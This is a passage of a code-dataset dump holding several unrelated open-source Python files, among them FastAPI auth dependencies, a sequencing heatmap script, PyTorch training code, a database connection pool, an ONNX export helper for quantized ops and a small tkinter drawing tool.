wellformed\n \"\"\"\n app_services: Services = request.app.state.services\n if not token or token.strip() == \"\":\n return ANON_USER\n return app_services.auth.get_token_email(token)\n\n\nasync def get_current_user(\n request: Request, email: str = Depends(get_authorized_user_email_or_anon)\n) -> schemas.User:\n \"\"\"Retrieve the data of the current user from the database.\"\"\"\n\n services: Services = request.app.state.services\n dynamo: DynamoDBService = services.dynamo\n\n if email == ANON_USER:\n return schemas.User(email=ANON_USER, is_admin=False)\n\n # try to fetch the user's information in case they are already registered\n current_user_in_db: Optional[dynamo_models.User] = None\n try:\n current_user_in_db: dynamo_models.User = get_user(email=email, db=dynamo)\n except UserNotFoundError:\n ...\n\n # If the current user isn't registered, register them. They've only made\n # it this far it they authenticated with cognito and have a signed JWT\n # token with their email in it.\n current_user: Optional[schemas.User] = None\n if current_user_in_db:\n current_user_dynamo_model: dynamo_models.User = get_user(email=email, db=dynamo)\n current_user: schemas.User = dynamo_to_pydantic__user(dynamo_user=current_user_dynamo_model)\n else:\n register_user(email=email, is_admin=False, db=dynamo)\n current_user = schemas.User(email=email, is_admin=False)\n\n return current_user\n\n\n# def get_graphql_context(\n# request: Request,\n# db: Session = Depends(get_async_session),\n# user: schemas.User = Depends(get_current_user),\n# ) -> RootskiGraphQLContext:\n# \"\"\"Prepare the context object used by GraphQL resolvers.\"\"\"\n# return RootskiGraphQLContext(\n# request=request,\n# session=db,\n# user=user,\n# )\n","repo_name":"rootski-io/rootski","sub_path":"rootski_api/src/rootski/main/deps.py","file_name":"deps.py","file_ext":"py","file_size_in_byte":3566,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"53"} +{"seq_id":"41564509482","text":"\"\"\"\nJoshua Arribere, March 30, 2020\n\nScript to make a heatmap of read length v number of reads.\n\nInput: inFile.jam - .jam file\n readLengthLower, readLengthUpper - how short and long\n of read lengths you wish to examine\n startLeft, startRight, stopLeft, stopRight - how many\n nts to look up/downstream of start/stop. For ex:\n -10 50 -50 20 would be [-10,50], [-50,20]\n\nOutput: heatmap of reads per million\n\nrun as python metaStartStopHeatMap2.py inFile.jam 15 18 \n -10 50 -50 20 outPrefix\n\"\"\"\nimport sys, seaborn, matplotlib.pyplot\nfrom logJosh import Tee\nimport pandas\n\ndef getPosition(txtList,index):\n \"\"\"txtList is a list of txtInfo a la joshSAM. Will\n loop through all the txts. If the index position of\n the txts is all the same, then will return that\n position. Else will return 'na'. Will also require\n that all be Sense (not Antisense).\"\"\"\n transciptList = txtList.split('|')\n positions=[entry.split(':')[index] for entry in transciptList]\n positions=map(int,positions)\n positions=list(set(positions))\n if len(positions)==1:\n return positions[0]\n return 'na'\n\ndef parseJoshSAMToDataFrame(inFile,\n readLengthLower,readLengthUpper,\n leftBound,rightBound,startOrStop):\n \"\"\"inFile is a .jam file. Will look between\n [leftBound,rightBound] relative to the startOrStop\n (1 if start, 2 if stop).\n Will initially add read counts for reads that\n are unambiguously assignable to a position on a txt.\n Then will normalize those to make rpm where m is million\n unambiguously assignable reads\"\"\"\n print('Restriction for uniquely mapping reads is on!')\n #for the next line you need to use data=0. Using\n #data=None initialized the df w/ NaN, which doesn't\n #work w/ subsequent incrementation.\n df=pandas.DataFrame(data=0,\n index=range(readLengthLower,readLengthUpper+1),\n columns=range(leftBound,rightBound+1))\n cntr=0\n with open(inFile,'r') as f:\n ##skip the first line\n next(f)\n ##now do analyses\n for line in f:\n if not line.startswith('@'):\n line=line.strip().split('\\t')\n if len(line)>=10:\n position=getPosition(line[9],startOrStop)\n if position!='na' and line[8].endswith(':S'):\n readLength=len(line[6])\n if line[7]=='1:1' and line[3]=='-':\n if readLength in range(readLengthLower,\n readLengthUpper+1):\n cntr+=1\n if position in range(leftBound,\n rightBound+1):\n df.loc[readLength,position]+=1\n #now normalize to make rpm\n norm=float(cntr)/1000000.\n for ii in range(readLengthLower,readLengthUpper+1):\n for jj in range(leftBound,rightBound+1):\n df.loc[ii,jj]/=norm\n #return the DataFrame\n return df\n\ndef mkHeatMaps(dfStart,dfStop,outPrefix):\n \"\"\"Will plot the pair of dataframes dfStart and dfStop\n next to one another in outPrefix file\"\"\"\n #\n fig,axs=matplotlib.pyplot.subplots(nrows=2,\n ncols=1)\n ##subplot titles\n #axs[0].set_title('Position Relative Start Codon (nt)')\n #axs[1].set_title('Position Relative Stop Codon (nt)')\n #subplot of the start codon\n seaborn.heatmap(dfStart,ax=axs[0],cmap=\"YlGnBu\",\n square=True,\n linewidths=.5,\n cbar_kws={\"orientation\": \"horizontal\",\n \"pad\": 0.35,\n \"aspect\": 40,\n \"label\": 'RPM'})\n #subplot of the stop codon\n seaborn.heatmap(dfStop,ax=axs[1],cmap=\"YlGnBu\",\n square=True,\n linewidths=.5,\n cbar_kws={\"orientation\": \"horizontal\",\n \"pad\": 0.35,\n \"aspect\": 40,\n \"label\": 'RPM'})\n #\n #add subplot axis labels\n axs[0].set_xlabel('Position Relative Start Codon (nt)')\n axs[1].set_xlabel('Position Relative Stop Codon (nt)')\n axs[0].set_ylabel('Read Length (nt)')\n axs[1].set_ylabel('Read Length (nt)')\n #fig=axs.get_figure()\n #write output\n fig.savefig(f'{outPrefix}.png')\n fig.savefig(f'{outPrefix}.svg')\n\ndef main(args):\n #parse the in file\n inFile=args[0]\n #get the readLengths\n readLengthLower,readLengthUpper=map(int,args[1:3])\n #get the start/stop bounds\n startLeft,startRight,stopLeft,stopRight=map(\n int,args[3:7])\n if startLeft>0 or stopLeft>0:\n print(\"Head's up: if you want to look at positions \\\n upstream of the start/stop codon, your \\\n startLeft and stopLeft bounds need to be \\\n negative. They currently are not.\")\n #now that we have those inputs, it should\n #be possible to make the heatmap\n dfStart=parseJoshSAMToDataFrame(inFile,\n readLengthLower,readLengthUpper,\n startLeft,startRight,1)\n dfStop=parseJoshSAMToDataFrame(inFile,\n readLengthLower,readLengthUpper,\n stopLeft,stopRight,2)\n #and grab the output file name\n outPrefix=args[7]\n #make the heatmap\n #mkHeatMaps(dfStart,dfStop,outPrefix)\n ##return the df instead of plotting it\n return dfStart,dfStop\n\nif __name__=='__main__':\n Tee()\n main(sys.argv[1:])\n","repo_name":"arriberelab/arriberelab","sub_path":"step1_pipelineScripts/metaStartStopHeatMap2.py","file_name":"metaStartStopHeatMap2.py","file_ext":"py","file_size_in_byte":5375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18467136420","text":"import os\nimport tarfile\nfrom typing import Any, Dict, Sequence, Tuple, Union, cast\n\nimport torch\nimport torchvision\nfrom torch import nn\nfrom determined.pytorch import DataLoader, PyTorchTrial, reset_parameters\nfrom torchvision import models, transforms\nfrom tqdm import tqdm\n\n\nfrom data import CatDogDataset, get_test_transforms\nTorchData = Union[Dict[str, torch.Tensor], Sequence[torch.Tensor], torch.Tensor]\n\n\nclass CatDogModel(PyTorchTrial):\n def __init__(self, context):\n self.context = context\n self.data_dir = \"images/\"\n self.test_transform = get_test_transforms()\n\n def build_model(self) -> nn.Module:\n model = models.resnet50(pretrained=True)\n model.fc = nn.Linear(2048, 2)\n return model\n\n def optimizer(self, model: nn.Module) -> torch.optim.Optimizer: # type: ignore\n return torch.optim.SGD(model.parameters(),\n lr=float(self.context.get_hparam(\"learning_rate\")),\n momentum=0.9,\n weight_decay=float(self.context.get_hparam(\"weight_decay\")),\n nesterov=self.context.get_hparam(\"nesterov\"))\n\n def train_batch(\n self, batch: TorchData, model: nn.Module, epoch_idx: int, batch_idx: int\n ) -> Dict[str, torch.Tensor]:\n batch = cast(Tuple[torch.Tensor, torch.Tensor], batch)\n data, labels = batch\n\n output = model(data)\n loss = torch.nn.functional.cross_entropy(output, labels)\n return {\"loss\": loss}\n\n def evaluate_batch(self, batch: TorchData, model: nn.Module) -> Dict[str, Any]:\n \"\"\"\n Calculate validation metrics for a batch and return them as a dictionary.\n This method is not necessary if the user overwrites evaluate_full_dataset().\n \"\"\"\n batch = cast(Tuple[torch.Tensor, torch.Tensor], batch)\n data, labels = batch\n\n output = model(data)\n pred = output.argmax(dim=1, keepdim=True)\n accuracy = pred.eq(labels.view_as(pred)).sum().item() / len(data)\n return {\"accuracy\": accuracy}\n\n def build_train_dataset(self):\n transform = transforms.Compose([\n transforms.Resize(240),\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ])\n ds = CatDogDataset(self.data_dir, train=True, transform=transform)\n return ds\n\n def build_test_dataset(self):\n ds = CatDogDataset(self.data_dir, train=False, transform=self.test_transform)\n return ds\n\n def build_training_data_loader(self) -> Any:\n ds = self.build_train_dataset()\n return DataLoader(ds, batch_size=self.context.get_per_slot_batch_size())\n\n def build_validation_data_loader(self) -> Any:\n ds = self.build_test_dataset()\n return DataLoader(ds, batch_size=self.context.get_per_slot_batch_size())\n","repo_name":"determined-ai/works-with-determined","sub_path":"dvc/model_def.py","file_name":"model_def.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"} +{"seq_id":"33514162623","text":"# (c) 2014 Amplify Education, Inc. All rights reserved, subject to the license\n# below.\n#\n# Education agencies that are members of the Smarter Balanced Assessment\n# Consortium as of August 1, 2014 are granted a worldwide, non-exclusive, fully\n# paid-up, royalty-free, perpetual license, to access, use, execute, reproduce,\n# display, distribute, perform and create derivative works of the software\n# included in the Reporting Platform, including the source code to such software.\n# This license includes the right to grant sublicenses by such consortium members\n# to third party vendors solely for the purpose of performing services on behalf\n# of such consortium member educational agencies.\n\n\"\"\"\nThis module defines a simple CSV file writer.\n\"\"\"\n\nimport csv\n\n\ndef write_csv(file_object, rows, header=None, delimiter=','):\n \"\"\"\n Write the header and data to the specified file in CSV format.\n NOTE: Special characters will be quoted.\n\n @param file: Directory pathname of CSV file to be written.\n @param header: Header row for CSV file.\n @param rows: Data rows for CSV file.\n \"\"\"\n csvwriter = csv.writer(file_object, delimiter=delimiter, quoting=csv.QUOTE_MINIMAL)\n if header is not None:\n csvwriter.writerow(header)\n csvwriter.writerows(rows)\n return True\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"edcore/edcore/utils/csv_writer.py","file_name":"csv_writer.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"5542883579","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n@File : config.py\n@Time : 2023/01/13 16:19:42\n@Author : Huang zh\n@Contact : jacob.hzh@qq.com\n@Version : 0.1\n@Desc : None\n'''\n\nML_MODEL_NAME = ['lg', 'knn', 'dt', 'rf', 'gbdt', 'xgb', 'catboost', 'svm', 'bayes']\n\nDL_MODEL_NAME = ['lstm', 'cnn', 'transformer', 'capsules']\n\nPRE_MODEL_NAME = ['mac_bert', 'bert_wwm', 'bert', 'nezha_wwm', 'roberta_wwm']\n\nBATCH_SIZE = 8\n\nSPLIT_SIZE = 0.3\n\nIS_SAMPLE = True\n\nPIC_SAVED_PATH = './pic/' # result的pic图片保存的路径\n\nVOCAB_MAX_SIZE = 100000 # 词表中词的最大数量\n\nWORD_MIN_FREQ = 5 # 词表中一个单词出现的最小频率\n\nVOCAB_SAVE_PATH = './data/vocab_dic.pkl' # 词表存储的位置\n\nL2I_SAVE_PATH = './data/label2id.pkl' # label的映射表\n\nPRETRAIN_EMBEDDING_FILE = './data/embed.txt'\n\nVERBOSE = 1 # 每隔10个epoch 输出一次训练结果和测试的loss\n\nMAX_SEQ_LEN = 100 # 使用预训练模型时,设置允许每条文本数据的最长长度","repo_name":"hziheng/Machine-learning-project-for-text-classification","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"19354473266","text":"import numpy as np\nimport pandas as pd\n\nclass brain_structure:\n def __init__(self, input_file):\n # Read table\n MAXSIZE = 100\n my_cols = [i for i in range(MAXSIZE)]\n df = pd.read_csv(input_file, names=my_cols, engine='python',\n skiprows=[0],\n index_col=[1],\n skipinitialspace=True)\n df = df.drop([0, 3, 4, 5, 6, 7, 8], axis=1)\n for i in range(df.shape[0]):\n for j in range(df.shape[1]):\n if df.iloc[i, j] is None:\n df.iloc[i, j] = np.nan\n df.columns = [\"Abbreviation\"] + [i for i in range(1, df.shape[1])]\n df_isnull = df.isnull()\n\n # Get levels of each row\n level = []\n description = []\n for i in range(len(df)):\n for j in range(1, df.shape[1]):\n if not df_isnull.iloc[i, j]:\n level.append(j)\n description.append(df.iloc[i, j])\n break\n MAXLEVEL = np.max(level)\n level = pd.DataFrame({'level': level, 'Abbreviation': df.Abbreviation.tolist(), 'Description': description},\n index=df.index)\n \n # Drop redundant columns\n df = df.iloc[:, :(MAXLEVEL + 2)] # The last column will contain only NaN\n df_isnull = df.isnull()\n\n # Fill empty slots in the table\n df_fill = df.copy()\n for i in range(1, df.shape[1]):\n cur_region = None\n for j in range(df.shape[0]):\n if not df_isnull.iloc[j, i]:\n cur_region = df.iloc[j, i]\n cur_level = level.loc[df.index[j], 'level']\n # print(j, cur_region, cur_level)\n elif (not cur_region is None) & (cur_level < level.loc[df.index[j], 'level']):\n df_fill.iloc[j, i] = cur_region\n\n self.input_file = input_file\n self.df = df_fill\n self.level = level\n self.selected_regions = self.df.index.tolist()\n self.dict_to_selected = {}\n for cur_region in self.selected_regions:\n child_ids = self.get_all_child_id(cur_region)\n for i in child_ids:\n self.dict_to_selected[i] = cur_region\n return\n\n def name_to_id(self, region_name):\n # region_name can be either Abbreviation (checked first) or description\n tp = self.level[self.level.Abbreviation == region_name]\n if len(tp) != 0:\n return tp.index[0]\n tp = self.level[self.level.Description == region_name]\n if len(tp) != 0:\n return tp.index[0]\n print(\"Cannot find any regions named %s.\" % region_name)\n return -1\n\n def get_all_child_id(self, structure_id):\n if type(structure_id) == str:\n structure_id = self.name_to_id(structure_id)\n cur_lvl = self.level.loc[structure_id]\n tp = self.df[self.df[cur_lvl.level]==cur_lvl['Description']]\n return tp.index.tolist()\n\n def get_selected_regions(self, input_file):\n brain_levels = pd.read_excel(input_file,\n usecols=[1, 2, 3, 5], index_col=0,\n names=['', 'Description', 'Abbreviation', 'level']\n )\n self.selected_regions = brain_levels.index.tolist()\n self.dict_to_selected = {}\n for cur_region in self.selected_regions:\n child_ids = self.get_all_child_id(cur_region)\n for i in child_ids:\n self.dict_to_selected[i] = cur_region\n return\n\n\n\n def id_to_name(self, region_ID):\n # region_name can be either Abbreviation (checked first) or description\n if region_ID in self.level.index.tolist():\n return self.level.loc[region_ID,'Abbreviation']\n else:\n print(\"Cannot find any regions with ID %s.\" % region_ID)\n \n\n\n\n\n","repo_name":"pengxie-bioinfo/neuro_morpho_toolbox","sub_path":"neuro_morpho_toolbox/brain_structure.py","file_name":"brain_structure.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"72008578408","text":"import json\nimport requests\n\n\nclass activity():\n def __init__(self, j):\n\n # interval\n content = [\"start\", \"end\"]\n for i in content:\n try:\n self.__dict__[\"interval_\"+i] = j[\"interval\"][i]\n except:\n self.__dict__[\"interval_\"+i] = None\n\n # games\n games_type = [\"chess960\",\n \"blitz\",\n \"crazyhouse\",\n \"antichess\",\n \"bullet\",\n \"correspondence\",\n \"atomic\",\n \"rapid\",\n \"classical\",\n \"racingKings\",\n \"horde\",\n \"ultraBullet\",\n \"threeCheck\",\n \"kingOfTheHill\"]\n content = [\"win\", \"loss\", \"draw\", \"rp\"]\n try:\n for i in j[\"games\"]:\n for t in games_type:\n for k in content:\n try:\n self.__dict__[\"games_\"+t+\"_\"+k] = \\\n j[\"games\"][t][k]\n except:\n self.__dict__[\"games_\"+t+\"_\"+k] = None\n\n except:\n for t in games_type:\n for k in content:\n self.__dict__[\"games_\"+t+\"_\"+k] = None\n\n # correspondenceMoves\n try:\n self.correspondence_nb = j[\"correspondenceMoves\"][\"nb\"]\n except:\n self.correspondence_nb = None\n\n self.correspondence_games = []\n try:\n for i in j[\"correspondenceMoves\"][\"games\"]:\n self.correspondence_games.append(i)\n\n except:\n pass\n\n # tournaments\n try:\n self.tournaments_nb = j[\"tournaments\"][\"nb\"]\n except:\n self.tournaments_nb = None\n\n self.tournaments_best = []\n try:\n for i in j[\"tournaments\"][\"best\"]:\n self.tournaments_best.append(i)\n except:\n pass\n\n # follows\n try:\n self.follows_nb = j[\"follows\"][\"in\"][\"nb\"]\n except:\n self.follows_nb = None\n\n self.follows = []\n try:\n for i in j[\"follows\"][\"in\"][\"ids\"]:\n self.follows.append(i)\n except:\n pass\n\n # puzzles\n content = [\"win\", \"loss\", \"draw\", \"rp\"]\n for i in content:\n try:\n self.__dict__[\"puzzles_\"+i] = j[\"puzzles\"][\"score\"][i]\n except:\n self.__dict__[\"puzzles_\"+i] = None\n\n # posts\n self.posts = []\n try:\n for i in j[\"posts\"]:\n self.posts.append(i)\n except:\n pass\n\n\ndef get_activity(us_name):\n url = \"https://lichess.org/api/user/{}/activity\".format(us_name)\n\n datajson = requests.get(url).text\n j = json.loads(datajson)\n\n act_list = []\n for i in j:\n act_list.append(activity(i))\n\n return act_list\n","repo_name":"Axeltherabbit/liapi","sub_path":"liapi/activityapi.py","file_name":"activityapi.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74452250087","text":"import psycopg2\nfrom psycopg2 import pool\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\nclass ConnectionPool:\n _instance = None\n\n def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = super(ConnectionPool, cls).__new__(cls)\n cls._instance.initialize_connection_pool()\n return cls._instance\n\n return cls._instance\n\n def initialize_connection_pool(self):\n db_params = {\n 'database': os.getenv('DATABASE_NAME'),\n 'user': os.getenv('DATABASE_USER'),\n 'password': os.getenv('DATABASE_PASSWORD'),\n 'host': os.getenv('DATABASE_HOST'),\n 'port': os.getenv('DATABASE_PORT')\n }\n\n self.connection_pool = psycopg2.pool.SimpleConnectionPool(1, 5, **db_params)\n\n def get_connection(self):\n return self.connection_pool.getconn()\n\n def release_connection(self, connection):\n self.connection_pool.putconn(connection)\n\n\nif __name__ == '__main__':\n pool = ConnectionPool()\n conn1 = pool.get_connection()\n\n if conn1:\n print('Connection 1 acquired')\n cursor1 = conn1.cursor()\n cursor1.execute(\"SELECT * FROM movie_movie\")\n result = cursor1.fetchall()\n print(result)\n cursor1.close()\n pool.release_connection(conn1)\n\n conn2 = pool.get_connection()\n\n if conn2:\n print('Connection 2 acquired')\n cursor2 = conn2.cursor()\n cursor2.execute(\"SELECT * FROM user_review_userreview\")\n result = cursor2.fetchall()\n print(result)\n cursor2.close()\n pool.release_connection(conn2)\n\n\n","repo_name":"IshaqNiloy/design_patterns","sub_path":"singleton.py","file_name":"singleton.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23070579146","text":"import tkinter as tk\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\nimport os\r\nfrom turtle import *\r\n\r\nwin1 = tk.Tk()\r\nwin1.title('MY main') # 添加窗体名称\r\nwin1.geometry('670x470') # 设置窗体大小\r\n\r\n\r\ndef msgbox():\r\n color('red', 'yellow')\r\n\r\n begin_fill()\r\n while True:\r\n forward(200)\r\n left(170)\r\n if abs(pos()) < 1:\r\n break\r\n end_fill()\r\n done()\r\ndef he():\r\n os.system(\"C:\\Windows\\System32/mspaint.exe\")\r\n\r\nButton(win1, text=\"自动画太阳\", command=msgbox).pack()\r\nButton(win1, text=\"自己画\", command=he).pack()\r\n\r\nwin1.mainloop()\r\n","repo_name":"2011my/tools","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32222981393","text":"from recipe_engine import post_process\n\nPYTHON_VERSION_COMPATIBILITY = 'PY3'\n\nDEPS = [\n 'bot_update',\n 'gclient',\n 'recipe_engine/buildbucket',\n 'recipe_engine/cq',\n 'recipe_engine/properties',\n 'recipe_engine/step',\n]\n\n\ndef RunSteps(api):\n src_cfg = api.gclient.make_config()\n soln = src_cfg.solutions.add()\n soln.name = 'src'\n soln.url = 'https://chromium.googlesource.com/chromium/src.git'\n try:\n bot_update_step = api.bot_update.ensure_checkout(\n patch=True, gclient_config=src_cfg)\n except api.step.StepFailure:\n api.step(\n name='cq will not retry this'\n if api.cq.do_not_retry_build else 'will retry',\n cmd=None)\n\n\ndef GenTests(api):\n\n yield (api.test('works as intended') + api.buildbucket.try_build(\n 'chromium/src',\n 'try',\n 'linux',\n git_repo='https://chromium.googlesource.com/chromium/src') +\n api.properties(fail_patch='apply') + api.step_data(\n 'bot_update', retcode=88) + api.post_check(\n lambda check, steps: check('cq will not retry this' in steps))\n + api.post_process(post_process.DropExpectation))\n","repo_name":"iridium-browser/iridium-browser","sub_path":"third_party/depot_tools/recipes/recipe_modules/bot_update/tests/do_not_retry_patch_failures_in_cq.py","file_name":"do_not_retry_patch_failures_in_cq.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":314,"dataset":"github-code","pt":"53"} +{"seq_id":"72271420647","text":"r\"\"\"Register quantized ops for ONNX.\nThis file registers a custom symbolic function\nfor exporting quantized models to ONNX.\n\"\"\"\nimport inspect\nimport warnings\nfrom numbers import Integral, Real\n\nimport changan_plugin_pytorch\nimport torch\nfrom torch.onnx import register_custom_op_symbolic\nfrom cap.utils.apply_func import flatten\n\n\ndef symbolic_quantized_op(\n g: torch._C.Graph, n: torch._C.Node, *args, **kwargs\n):\n r\"\"\"\n Register quantized ops for ONNX. This function will flatten List[Tensor]\n inputs and outputs to single Tensor because autograd function do not\n support List[Tensor] now.\n\n Note: Must be used with `script_quantized_fn` defined in\n script_quantized_fn.py\n \"\"\"\n\n # args format:\n # (\n # function name,\n # tuple of per list lengths of 'List[Tensor]' args in input args,\n # input args with flatten list inputs,\n # )\n # example:\n # origin args: func(Tensor, int, [Tensor1, Tensor2], int)\n # processed args: (func_name, 2, Tensor, int, Tensor1, Tensor2, int)\n fn_name, per_list_lens, *args = args\n\n if not isinstance(fn_name, str):\n return None\n\n module = None\n if \".\" in fn_name:\n # float op forward or segment_lut methods\n module_name, func_name = fn_name.split(\".\")\n # module is 'self' arg in forward function\n module, *args = args\n if func_name == \"forward\":\n func = getattr(\n changan_plugin_pytorch.nn, module_name, None\n ).forward\n fn_name = module_name # use module_name in onnx\n elif func_name in (\n \"_init_single_table_params\",\n \"_init_multi_table_params\",\n ):\n func = getattr(\n changan_plugin_pytorch.nn.quantized.SegmentLUT, func_name, None\n )\n else:\n raise ValueError(\"Unknown qualname {}\".format(fn_name))\n else:\n func = getattr(\n changan_plugin_pytorch.nn.quantized.functional, fn_name, None\n )\n if func is None:\n return None\n\n (\n arg_names,\n varargs,\n varkw,\n defaults,\n kwonlyargs,\n kwonlydefaults,\n annotations,\n ) = inspect.getfullargspec(func.__original_fn)\n # do not show 'self' arg in onnx\n arg_names = arg_names[1:] if module is not None else arg_names\n\n arg_idx_mapping = list(range(len(arg_names)))\n\n # list_of_tensor_arg_idx:\n # A list of List[Tensor] args indexes in func.\n # If no List[Tensor] args, will be []\n if func.list_of_tensor_arg_idx:\n # update idx to find args name in origin args\n list_arg_len_map = zip(\n reversed(func.list_of_tensor_arg_idx), reversed(per_list_lens)\n )\n for idx, list_len in list_arg_len_map:\n for _ in range(list_len - 1):\n arg_idx_mapping.insert(idx, idx)\n\n code = 'g.op(\"changan::{}\", '.format(fn_name)\n\n # put Tensor args in the front\n for i, arg in enumerate(args):\n if isinstance(arg, torch._C.Value):\n code += \"args[{}], \".format(i)\n\n type_to_reg_mapping = {\n Real: \"f\",\n Integral: \"i\",\n bool: \"i\",\n str: \"s\",\n torch.Tensor: \"t\",\n }\n\n def get_type(arg):\n if isinstance(arg, Integral):\n return Integral\n elif isinstance(arg, Real):\n return Real\n elif isinstance(arg, str): # for QuantDtype\n return str\n else:\n return type(arg)\n\n # process not Tensor args\n for i, arg in enumerate(args):\n reg_annt = type_to_reg_mapping.get(get_type(arg), None)\n # process list and tuple of (int, float, bool, s)\n if reg_annt is None:\n if isinstance(arg, (list, tuple)):\n reg_annt = type_to_reg_mapping.get(get_type(arg[0]), None)\n\n # Not support type arg(and arg is not None) will be converted to str\n if (\n arg is not None\n and reg_annt is None\n and not isinstance(arg, torch._C.Value)\n ):\n warnings.warn(\n \"FUNCTION '{}' ARG '{}' type is {}, \".format(\n fn_name, arg_names[arg_idx_mapping[i]], type(arg)\n )\n + \"which is not support in ONNX, will be converted to 'str'.\"\n )\n reg_annt = \"s\"\n args[i] = str(args[i])\n\n if reg_annt is not None:\n code += \"{}_{}=args[{}], \".format(\n arg_names[arg_idx_mapping[i]], reg_annt, i\n )\n\n output_nodes = list(n.outputs())\n\n code = code[:-2] + \", outputs={})\".format(len(output_nodes))\n\n if fn_name == 'AnchorGenerator':\n code = code[:-1] + \", feat_strides_i={}\".format(\n module.feat_strides, module.anchor_wh_groups\n )\n code += \", image_hw_i={}\".format(\n module.image_hw\n )\n for stride, anchor_wh_groups in zip(module.feat_strides, module.anchor_wh_groups):\n code += \", anchor_wh_groups_{}_i={}\".format(stride, flatten(anchor_wh_groups)[0])\n code += \", legacy_bbox_i={})\".format(module.legacy_bbox)\n elif fn_name == 'DetectionPostProcessV1':\n code = code[:-1] + \", num_classes_i={}\".format(\n module.num_classes\n )\n code += \", class_offsets_i={}\".format(\n module.class_offsets\n )\n code += \", use_clippings_i={}\".format(\n module.use_clippings\n )\n code += \", image_hw_i={}\".format(\n module.image_size\n )\n code += \", nms_iou_threshold_f={}\".format(\n module.nms_threshold\n )\n code += \", nms_margin_f={}\".format(\n module.nms_margin\n )\n code += \", box_filter_threshold_f={}\".format(\n module.box_filter_threshold\n )\n code += \", pre_nms_top_k_i={}\".format(\n module.pre_nms_top_k\n )\n code += \", post_nms_top_k_i={}\".format(\n module.post_nms_top_k\n )\n # code += \", nms_padding_mode_s={}\".format(\n # str(module.nms_padding_mode)\n # )\n code += \", bbox_min_hw_i={})\".format(\n module.bbox_min_hw\n )\n elif fn_name == 'MultiScaleRoIAlign':\n code = code[:-1] + \", output_size_i={}\".format(\n module.output_size\n )\n code += \", image_hw_i={}\".format(\n module.image_hw\n )\n code += \", feature_strides_i={}\".format(\n module.feature_strides\n )\n code += \", canonical_level_i={}\".format(\n module.canonical_level\n )\n code += \", aligned_i={})\".format(\n module.aligned\n )\n\n ret = eval(code)\n\n if isinstance(ret, (list, tuple)):\n list_ret = ret\n else:\n list_ret = [ret]\n for r, node in zip(list_ret, output_nodes):\n r.setType(node.type())\n\n return ret\n\n\nregister_custom_op_symbolic(\"::prim_PythonOp\", symbolic_quantized_op, 1)\n","repo_name":"xingyun-xy/cap","sub_path":"changan_plugin_pytorch/utils/_register_quantized_onnx_ops.py","file_name":"_register_quantized_onnx_ops.py","file_ext":"py","file_size_in_byte":6973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41875320049","text":"n = 9\r\nreps = 1000000\r\ncount = 0\r\nfrom random import randint\r\n\r\nfor x in range(0,reps):\r\n\tdie1 = randint(1,n)\r\n\tdie2 = randint(1,n)\r\n\tif die1<4 and die2<4:\r\n\t\tif die1==3 or die2==3:\r\n\t\t\tcount = count+1\r\n\r\nprint(count/reps)\r\n","repo_name":"kana-mycin/quick-scripts","sub_path":"5 over n2.py","file_name":"5 over n2.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74172604329","text":"# Districts.\nNUMBER_OF_DISTRICTS = 1000\nMEAN_DISTANCE_CLIENT_DISTRICT = 20.0\nSTD_DISTANCE_CLIENT_DISTRICT = 8.0\nNUMBER_OF_CORES_DISTRICT = 2\nBANDWIDTH_CAPABILITY_DISTRICT = 10/1000 # MB that a core can process in a millisecond.\nMEAN_PROCESSING_START_DELAY_DISTRICT = 5.0\nSTD_PROCESSING_START_DELAY_DISTRICT = 2.0\n\n# Cities.\nNUMBER_OF_CITIES = 400\nMEAN_DISTANCE_CLIENT_CITY = 60.0\nSTD_DISTANCE_CLIENT_CITY = 15.0\nMEAN_DISTANCE_DISTRICT_CITY = 50.0\nSTD_DISTANCE_DISTRICT_CITY = 15.0\nNUMBER_OF_CORES_CITY = 2\nBANDWIDTH_CAPABILITY_CITY = 10 / 1000 # MB that a core can process in a millisecond.\nMEAN_PROCESSING_START_DELAY_CITY = 5.0\nSTD_PROCESSING_START_DELAY_CITY = 2.0\n\n# Territories.\nNUMBER_OF_TERRITORIES = 200\nMEAN_DISTANCE_CLIENT_TERRITORY = 300.0\nSTD_DISTANCE_CLIENT_TERRITORY = 100.0\nMEAN_DISTANCE_DISTRICT_TERRITORY = 290.0\nSTD_DISTANCE_DISTRICT_TERRITORY = 100.0\nNUMBER_OF_CORES_TERRITORY = 4\nBANDWIDTH_CAPABILITY_TERRITORY = 15 / 1000 # MB that a core can process in a millisecond.\nMEAN_PROCESSING_START_DELAY_TERRITORY = 4.0\nSTD_PROCESSING_START_DELAY_TERRITORY = 1.0\n\n# Countries.\nNUMBER_OF_COUNTRIES = 80\nMEAN_DISTANCE_CLIENT_COUNTRY = 